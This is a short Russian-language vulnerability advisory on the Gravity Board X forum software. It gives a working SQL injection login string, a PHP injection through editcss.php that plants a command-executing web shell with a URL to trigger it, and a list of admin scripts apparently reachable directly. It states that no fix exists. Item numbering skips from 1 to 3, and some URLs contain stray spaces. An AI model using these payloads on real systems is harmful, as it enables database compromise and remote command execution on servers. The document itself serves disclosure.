SQL-инъекция и выполнение произвольных команд в Gravity Board X

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, выполнить произвольные PHP команды на системе.

1. SQL-инъекция возможна из-за недостаточной проверки входных данных в параметре 'login'. Удаленный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

login: ' or isnull(1/0) /*
password: whatever

3. Уязвимость существует в сценарии 'editcss.php'. Удаленный пользователь может внедрить в шаблон произвольный PHP сценарий и выполнить его во время загрузки страницы с привилегиями web сервера. Пример:

http://[target]/[path]/editcss.php?csscontent=</style>
<?php%2 0system($HTTP_GET_VARS[cmd]);%20?>

http://[target]/[path]/index?cmd=[command]

http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path] /ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[targ et]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php

URL производителя: www.gravityboardx.com

Решение: Способов устранения уязвимости не существует в настоящее время.